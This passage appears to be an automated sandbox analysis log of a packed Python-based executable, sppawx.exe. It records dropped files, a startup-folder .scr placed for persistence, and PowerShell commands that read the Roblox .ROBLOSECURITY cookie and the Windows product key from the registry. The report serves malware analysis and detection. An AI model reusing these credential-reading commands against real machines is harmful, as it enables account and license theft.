              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCCB7200 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFEDCCB7200
              Source: sppawx.exeStatic PE information: real checksum: 0x77743c should be: 0x779c9a
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x169f0
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x53022
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x170f7
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x150ed
              Source: vebzhwcp.dll.69.drStatic PE information: real checksum: 0x0 should be: 0x4771
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9f7df
              Source: python312.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1ca53b
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x192b2f
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xcac1
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x10668
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x226ba
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x9cd5
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x396d1
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x100e6
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23988
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1149b
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCAD5CED push rdx; ret 2_2_00007FFEDCAD5CF7
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCAD5CE5 push r8; ret 2_2_00007FFEDCAD5CEB
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDCAD5CE0 push r10; retf 2_2_00007FFEDCAD5CE2
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD23D8E0 push rsp; retf 2_2_00007FFEDD23D8E2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFE7B24D2A5 pushad ; iretd 11_2_00007FFE7B24D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFE7B367BD6 push esp; ret 11_2_00007FFE7B367BD9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFE7B3600BD pushad ; iretd 11_2_00007FFE7B3600C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFE7B368678 push ebx; ret 11_2_00007FFE7B3686CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFE7B36861B push ebx; ret 11_2_00007FFE7B36862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 68_2_00007FFE7CAA00BD pushad ; iretd 68_2_00007FFE7CAA00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 68_2_00007FFE7CAA3DF2 push esi; retf 68_2_00007FFE7CAA3DFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 68_2_00007FFE7CAA3DD1 push edx; retf 68_2_00007FFE7CAA3DD2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 68_2_00007FFE7CAA3DFF push esi; retf 68_2_00007FFE7CAA3DFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 68_2_00007FFE7CAA3299 push es; retf 68_2_00007FFE7CAA329A
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: "C:\Users\user\Desktop\sppawx.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\sqlite3.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\libcrypto-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\libffi-8.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scrJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A315820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF79A315820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
